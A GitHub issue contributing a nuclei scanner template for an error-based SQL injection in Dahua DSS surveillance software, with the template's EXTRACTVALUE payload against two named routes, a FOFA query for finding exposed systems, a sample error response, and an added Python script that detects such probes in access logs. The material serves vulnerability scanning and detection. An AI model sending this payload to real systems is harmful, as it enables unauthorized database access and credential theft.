[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection #9423

Closed

shibeta opened this issue Mar 27, 2024 · 1 comment · Fixed by #9790
Labels: Done (Ready to merge), good first issue (Good for newcomers), nuclei-template (Nuclei template contribution)

Comments

shibeta commented Mar 27, 2024

Template Information:

Dahua DSS Digital Surveillance System is a security video monitoring system developed by Dahua.

A SQL injection vulnerability exists within Dahua DSS. Attackers can send specially crafted data packets to the attachment_clearTempFile.action or attachment_getAttList.action route, exploiting error-based injection to acquire sensitive information from the database. Beyond obtaining information from the database such as administrator credentials and personal information of users on the site, attackers could potentially write trojans to the server with sufficient privileges and further gain system-level access.

Relevant vulnerability ID: CNVD-2017-06001

Nuclei Template:

```yaml
id: CNVD-2017-06001

info:
  name: error-based SQL Injection in Dahua DSS
  author: napgh0st
  tags: cnvd,cnvd2017,sql-injection,dahua
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  severity: high
  metadata:
    fofa-query: app="dahua-DSS"

variables:
  random_num: "{{rand_int(10000, 99999)}}"
  random_text: "{{rand_base(5)}}"
  payload: "{{rand_int(800000, 999999)}}"
  poc: "1') AND EXTRACTVALUE({{random_num}},CONCAT(0x5c,(SELECT (ELT({{random_num}}={{random_num}},{{payload}}))),0x5c)) AND ('{{random_text}}'='{{random_text}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId={{poc}}&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId={{poc}}&bean.TabName=1"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "XPATH syntax error"
          - "{{payload}}"
```

valid match response snippet:

```text
org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and t.tab_Name=?   and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT (ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F')   and t.tmp_flag = ?]; SQL state [HY000]; error code [1105]; XPATH syntax error: '\909836\'; nested exception is java.sql.SQLException: XPATH syntax error: '\909836\'
```
@shibeta shibeta added the nuclei-template Nuclei template contribution label Mar 27, 2024
@ritikchaddha ritikchaddha linked a pull request May 14, 2024 that will close this issue
@ritikchaddha ritikchaddha added good first issue Good for newcomers Done Ready to merge labels May 14, 2024
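For anyone on the defending side of this template, the following is an added example (not shibeta's template and not code from the nuclei-templates project). It scans web-server access log lines for requests to the two `/portal/attachment_*.action` routes the template targets, flags a `bean.RecId` that is not a plain integer or that carries one of the error-based SQL functions the `poc` variable uses, and mirrors the template's `condition: and` matcher against an error body so a responder can confirm a probe actually succeeded. Assumptions: the access log is in combined format, and a legitimate `bean.RecId` is an integer (it lands in `t.rec_Id in('...')` in the quoted SQL). The log lines are constructed for this example; the error body is the response snippet quoted in the issue.

```python
"""Added example, not part of the nuclei template or project.

Flags probes against the Dahua DSS routes named in the template above and
replays the template's matcher against a captured error body.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Routes taken from the template's `path:` list.
WATCHED_ROUTES = {
    "/portal/attachment_clearTempFile.action",
    "/portal/attachment_getAttList.action",
}

# Assumption: a benign bean.RecId is a plain integer (see `t.rec_Id in('1')` in the snippet).
RECID_OK = re.compile(r"^\d+$")

# Error-based SQL functions used by the template's `poc` variable, matched on the decoded value.
INJECTION_HINT = re.compile(r"\b(extractvalue|updatexml|elt|concat)\s*\(", re.I)

# Minimal combined-format access log parser: client, timestamp, request line, status.
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log: a benign request, a template-style probe (percent-encoded form
# of the value shown in the issue's response snippet), an unrelated hit, a malformed RecId.
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [27/Mar/2024:10:00:01 +0000] "GET /portal/attachment_getAttList.action?bean.RecId=42&bean.TabName=1 HTTP/1.1" 200 512',
    '203.0.113.10 - - [27/Mar/2024:10:00:02 +0000] "GET /portal/attachment_getAttList.action?bean.RecId=1%27%29%20AND%20EXTRACTVALUE%2832776%2CCONCAT%280x5c%2C%28SELECT%20%28ELT%2832776%3D32776%2C909836%29%29%29%2C0x5c%29%29%20AND%20%28%276jQ6F%27%3D%276jQ6F&bean.TabName=1 HTTP/1.1" 500 2048',
    '203.0.113.10 - - [27/Mar/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 100',
    '203.0.113.10 - - [27/Mar/2024:10:00:04 +0000] "GET /portal/attachment_clearTempFile.action?bean.RecId=7%27&bean.TabName=1 HTTP/1.1" 500 300',
]

# Response body quoted from the issue's "valid match response snippet".
SAMPLE_ERROR_BODY = (
    "org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; "
    "uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and "
    "t.tab_Name=?   and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT "
    "(ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F')   and t.tmp_flag = ?]; "
    "SQL state [HY000]; error code [1105]; XPATH syntax error: '\\909836\\'; nested "
    "exception is java.sql.SQLException: XPATH syntax error: '\\909836\\'"
)


def inspect_access_line(line):
    """Return a finding dict for a suspicious request to a watched route, else None."""
    m = ACCESS_LINE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    if url.path not in WATCHED_ROUTES:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    rec_id = params.get("bean.RecId", [""])[0]  # parse_qs percent-decodes the value
    reasons = []
    if not RECID_OK.match(rec_id):
        reasons.append("bean.RecId is not a plain integer")
    if INJECTION_HINT.search(rec_id):
        reasons.append("SQL function call in bean.RecId")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": url.path,
        "rec_id": rec_id,
        "status": m.group("status"),
        "reasons": reasons,
    }


def scan_access_log(lines):
    """Run inspect_access_line over an iterable of log lines and keep the findings."""
    return [f for f in map(inspect_access_line, lines) if f is not None]


def matches_template_signature(body, payload):
    """Same test as the template's matcher: `condition: and` over both words."""
    return "XPATH syntax error" in body and str(payload) in body


# The database echoes the injected value between the 0x5c backslashes in the XPATH error.
LEAK_RE = re.compile(r"XPATH syntax error: '\\([^\\']*)\\'")


def leaked_value(body):
    """Return the value echoed inside the XPATH error, or None if the body has none."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['path']} "
              f"status={finding['status']}: {', '.join(finding['reasons'])}")
    print("matcher hit:", matches_template_signature(SAMPLE_ERROR_BODY, 909836))
    print("value echoed by the database:", leaked_value(SAMPLE_ERROR_BODY))
```

Running the script reports the two suspicious requests (the template-style probe, which also returned a 500, and the request with a stray quote in `bean.RecId`) and confirms that the quoted error body satisfies the template's two-word matcher. A non-integer `bean.RecId` on either route is the cheapest signal to alert on; the function-name check and the HTTP 500 raise the confidence, and `leaked_value` tells a responder which value the database actually returned.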
@ritikchaddha (Contributor) commented:

Hello @shibeta, thank you so much for sharing this template with the community and contributing to this project 🍻

You can grab some cool PD stickers over here http://nux.gg/stickers 😄
